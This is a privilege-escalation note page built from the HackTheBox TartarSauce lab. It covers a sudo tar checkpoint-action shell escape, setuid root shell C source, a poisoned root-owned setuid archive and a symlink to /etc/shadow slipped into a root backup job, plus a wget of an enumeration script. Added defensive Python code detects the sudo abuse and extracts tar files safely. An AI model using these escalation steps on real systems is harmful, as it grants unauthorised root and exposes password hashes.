# TAR backups

## Easy PrivEsc

```
> whoami
www-data
> sudo -l
(sally) NOPASSWD: /bin/tar

> sudo -u sally tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
> sudo -u sally tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
> whoami
sally
```
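The same sudo rule seen from the defender's side, as an added example that is not part of the original page: sudo logs every invocation to syslog/auth.log with the calling user, the target user and the full COMMAND line, so a `tar` run under sudo with `--checkpoint-action=exec=` is visible in plain text. The parser and the `find_tar_exec_abuse` function are hypothetical, and the log lines they run over are constructed to mirror the session above (host name, times and paths are made up).

```python
import re

# Constructed sample auth.log lines in the default sudo syslog layout:
#   "<user> : TTY=... ; PWD=... ; USER=<target> ; COMMAND=<argv>"
SAMPLE_AUTH_LOG = """\
Mar  3 10:14:02 web01 sudo: www-data : TTY=pts/0 ; PWD=/var/www ; USER=sally ; COMMAND=/bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Mar  3 10:14:09 web01 sudo:    sally : TTY=pts/0 ; PWD=/home/sally ; USER=root ; COMMAND=/bin/tar -czf /tmp/site.tgz /var/www/html
Mar  3 10:15:30 web01 sudo: www-data : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/bin/ls /root
Mar  3 10:16:00 web01 sudo: www-data : TTY=pts/0 ; PWD=/tmp ; USER=sally ; COMMAND=/bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
"""

SUDO_LINE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:\s+TTY=(?P<tty>\S+)\s+;\s+PWD=(?P<pwd>\S+)\s+;"
    r"\s+USER=(?P<target>\S+)\s+;\s+COMMAND=(?P<command>.*)$"
)

# The option used on this page: it makes tar run a program of the caller's choice,
# which a bare "NOPASSWD: /bin/tar" rule leaves entirely under the caller's control.
EXEC_OPTION = re.compile(r"--checkpoint-action=exec=")


def parse_sudo_line(line):
    """Return a dict with user/tty/pwd/target/command for a sudo syslog line, else None."""
    m = SUDO_LINE.search(line)
    return m.groupdict() if m else None


def find_tar_exec_abuse(log_text):
    """Return (user, target, command) for every sudo'd tar invocation that executes a program."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_sudo_line(line)
        if rec is None:
            continue
        argv0 = rec["command"].split()[0]            # the program sudo actually ran
        if argv0.rsplit("/", 1)[-1] == "tar" and EXEC_OPTION.search(rec["command"]):
            hits.append((rec["user"], rec["target"], rec["command"]))
    return hits


if __name__ == "__main__":
    for user, target, cmd in find_tar_exec_abuse(SAMPLE_AUTH_LOG):
        print(f"ALERT sudo {user} -> {target}: {cmd}")
```

The two `exec=` lines are flagged; the ordinary backup run by sally and the `ls` are not. The underlying fix is in sudoers rather than in detection: sudo matches argument lists exactly, so a rule that pins the full command line (for example `sally ALL=(root) NOPASSWD: /bin/tar -czf /var/backups/site.tgz /var/www/html`) or points at a wrapper script removes the caller's control over tar's options altogether.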

## Backup Script Vulnerability

* If root runs anything as a scheduled job, look for a way to influence what that job reads or writes
* Copy the script back to your host and take it apart for analysis
* Examples of root running TAR:
  * [WildcardTarTouchCheckpoint](/06-linux-privesc/lx-privesc.md#wildcard-tar-touch-checkpoint)
  * Extracting a TAR archive as root (this page)

## Just like NFS Root Squashing

* Similar to "NFS Root Squashing" and the "jail" box:
  * Make a setuid binary owned by root
  * gzip/tar the setuid binary
  * Copy it back and inject it into the 'temp' file the check uses
  * Root extracts it to 'check' the files
  * and thinks the files belong to him!
* REF: [NFSRootSquash](/06-linux-privesc/lx-privesc.md#nfs-root-squashing)

## Backup Script Discovery

* [Enum](/06-linux-privesc/lx-enum.md) to find the backup/script/job running
* Works just fine as 'user'

```
cd /tmp
wget http://$MyIP:5555/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

pspy32             ..get more details
locate backuperer  ..investigate
```

## Backup Flaw Scenario

1. Backup script runs **TAR as Root** every 5 minutes
2. Deletes the previous checks: /var/tmp/.\* and /var/tmp/check
3. Creates a gzip file of the directory /var/www/html with user-perms
4. Saves it in the file /var/tmp/.randomsha1
5. Sleeps for 30 seconds
6. Creates the directory /var/tmp/check
7. **Extracts gzip with Root**: /var/tmp/.randomsha1 to /var/tmp/check
8. If /var/www/html differs from the extracted copy /var/tmp/check/var/www/html:
   1. Report error.
   2. Otherwise, move file /var/tmp/.randomsha1 to /var/backups/onuma-www-dev.bak
   3. And delete the 'check' directory and .randomsha1

## Backup Flaw Exploit #1

* Script design is to tar as user, then **untar as root**
* Then compare previous version (which gives us 5 minutes)
* We can inject our evil tar:
* Script will: tar/copy/extract/compare.. and fail with error..
* Giving us 5 minutes to use **root-unzipped-files**

## Create the evil setuid

Check for a compiler on the target, and compile on kali for the target's architecture:

```
locate -r gcc$             ..gcc installed?

kali:
uname -a                   ..we have 32bit (should match target)
cp /opt/shells/setuid.c .
```

setuid.c (variant 1):

```
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    char *const sh_argv[] = { "/bin/sh", NULL };

    setreuid(0, 0);                   /* take the root uid the suid bit grants */
    execve("/bin/sh", sh_argv, NULL); /* replace this process with a shell */
    return 1;                         /* only reached if execve fails */
}
```

setuid.c (variant 2):

```
#include <unistd.h>

int main(void)
{
    setuid(0);                                  /* become root */
    execl("/bin/bash", "bash", (char *)NULL);   /* replace this process with bash */
    return 1;                                   /* only reached if execl fails */
}
```

Compile (gcc-multilib is needed for -m32 on a 64-bit kali):

```
apt search gcc-multilib
gcc -m32 -o setuid setuid.c   ..32 bit compile
```

## TAR the evil suid

* TAR embeds the userid that owns the file - in the actual archive
* We create this file and TAR as root .. it will stay root when extracted

kali (do this work as root so the archive records root as the owner):

```
sudo -i                        ..do this work as root
mkdir -p var/www/html          ..mock directory
cp suid var/www/html
chmod 6555 var/www/html/suid   ..set the suid bit
chmod u+s var/www/html/suid    ..alternate
ls -la var/www/html/
tar -zcvf setuid.tar.gz var/   ..mock tar

nc -nlvp 9002 < setuid.tar.gz  ..send
```

target:

```
> cd /var/tmp
> nc $MyIP 9002 > setuid.tar.gz

> watch -n 1 'systemctl list-timers'
created '.6683a76af11'               ..temp extract
> cp setuid.tar.gz .6683a76af11      ..INJECTED !!!

> watch -n 1 'systemctl list-timers'
root extracts '.6683a76af11' to the 'check' folder
untar and diffs as 'root'

> cd check/var/www/html
> ls -la
suid owned by root and suid-bit-set !!

> ./suid
# whoami
root
```

## Backup Flaw Exploit #2

* diff runs as root
* updates to readable error file:
  * /var/backups/onuma\_backup\_test.txt
* tar an **evil symlink** that root will extract/diff

```
cd /var/tmp/var/www/html
ln -s /etc/shadow index.html      ..symlink
ln -s /root/root.txt index.html   ..alternate
cat index.html                    ..denied
cd /var/tmp
tar -zcvf symlink.tar.gz var/     ..mock tar

watch -n 1 'systemctl list-timers'
created '.17f6c199'               ..temp extract
> cp symlink.tar.gz .17f6c199     ..swap our evil-tar-sym

job will untar and diff as 'root'
> cat /var/backups/onuma_backup_error.txt
'shadow' !
```
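Both exploits on this page (the root-owned setuid binary in "TAR the evil suid" and the symlink in "Exploit #2") work because of two properties the backup flaw scenario relies on: a tar archive carries the uid/gid and mode bits of every member, and an extraction run as root honours them unless told otherwise, while a link member is created as a link and then followed by whatever the job does next (here, the diff). The code below is an added example, not the page's or the TartarSauce box's own script: it builds a constructed archive containing the same two poisoned members, shows an audit that flags them, and shows an extraction that a root-run job could safely use. The function names (`build_sample_archive`, `audit_archive`, `safe_extract`) and the placeholder "binary" bytes are assumptions of this example.

```python
import io
import os
import stat
import tarfile
import tempfile


def build_sample_archive():
    """Constructed archive mirroring the var/www/html layout the job extracts, with
    a benign page, a root-owned setuid member and a symlink to /etc/shadow."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        page = b"<html>hello</html>\n"
        info = tarfile.TarInfo("var/www/html/about.html")
        info.size, info.uid, info.gid, info.mode = len(page), 1000, 1000, 0o644
        tf.addfile(info, io.BytesIO(page))

        blob = b"\x7fELF" + b"\x00" * 60          # placeholder bytes, not a real program
        info = tarfile.TarInfo("var/www/html/suid")
        info.size, info.uid, info.gid, info.mode = len(blob), 0, 0, 0o6555  # root, setuid+setgid
        tf.addfile(info, io.BytesIO(blob))

        info = tarfile.TarInfo("var/www/html/index.html")
        info.type, info.linkname = tarfile.SYMTYPE, "/etc/shadow"
        info.uid, info.gid = 1000, 1000
        tf.addfile(info)
    return buf.getvalue()


def audit_archive(data):
    """Return (member, reason) findings for anything a root-run extraction must not trust."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tf:
        for m in tf.getmembers():
            if m.name.startswith("/") or ".." in m.name.split("/"):
                findings.append((m.name, "path escapes the extraction directory"))
            if m.issym() or m.islnk():
                findings.append((m.name, f"link to {m.linkname}"))
            if m.mode & (stat.S_ISUID | stat.S_ISGID):
                findings.append((m.name, f"setuid/setgid bits set (mode {oct(m.mode)})"))
            if m.uid == 0 or m.gid == 0:
                findings.append((m.name, "owned by uid/gid 0 inside the archive"))
    return findings


def safe_extract(data, parent=None):
    """Extract into a fresh private directory, dropping links and special files and
    discarding archive ownership and setuid/setgid bits.  Returns (dest, {name: mode})."""
    dest = tempfile.mkdtemp(prefix="check.", dir=parent)   # mode 0700, unpredictable name
    modes = {}
    # Newer Pythons ship tarfile.data_filter, which enforces the same rules; use it when present.
    extra = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tf:
        for m in tf.getmembers():
            if not (m.isfile() or m.isdir()):
                continue                                    # no symlinks, hardlinks, devices
            if m.name.startswith("/") or ".." in m.name.split("/"):
                continue
            m.uid, m.gid = os.getuid(), os.getgid()         # ownership comes from us, not the archive
            m.mode &= ~(stat.S_ISUID | stat.S_ISGID)        # never recreate privileged bits
            tf.extract(m, path=dest, **extra)
            modes[m.name] = os.stat(os.path.join(dest, m.name)).st_mode & 0o7777
    return dest, modes


if __name__ == "__main__":
    archive = build_sample_archive()
    for name, why in audit_archive(archive):
        print(f"REJECT {name}: {why}")
    dest, modes = safe_extract(archive)
    print(f"extracted into {dest}: {modes}")
```

Running it flags `var/www/html/suid` (setuid bits and uid 0) and `var/www/html/index.html` (link to /etc/shadow), and the safe extraction produces only the two regular files, the former setuid one landing with plain 0555 permissions and the caller's ownership. The equivalent change to the shell script described above is to create the check directory with `mktemp -d` instead of a fixed path under /var/tmp and to extract with `tar -zxf "$tmpfile" -C "$check" --no-same-owner --no-same-permissions` (both are standard GNU tar options), which takes away the root-owned setuid file; refusing link members before the diff runs takes away the symlink read.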

## REF

* tartarHTB
* <https://ranakhalil101.medium.com/hack-the-box-tartarsauce-writeup-w-o-metasploit-e73393d4a0cd>

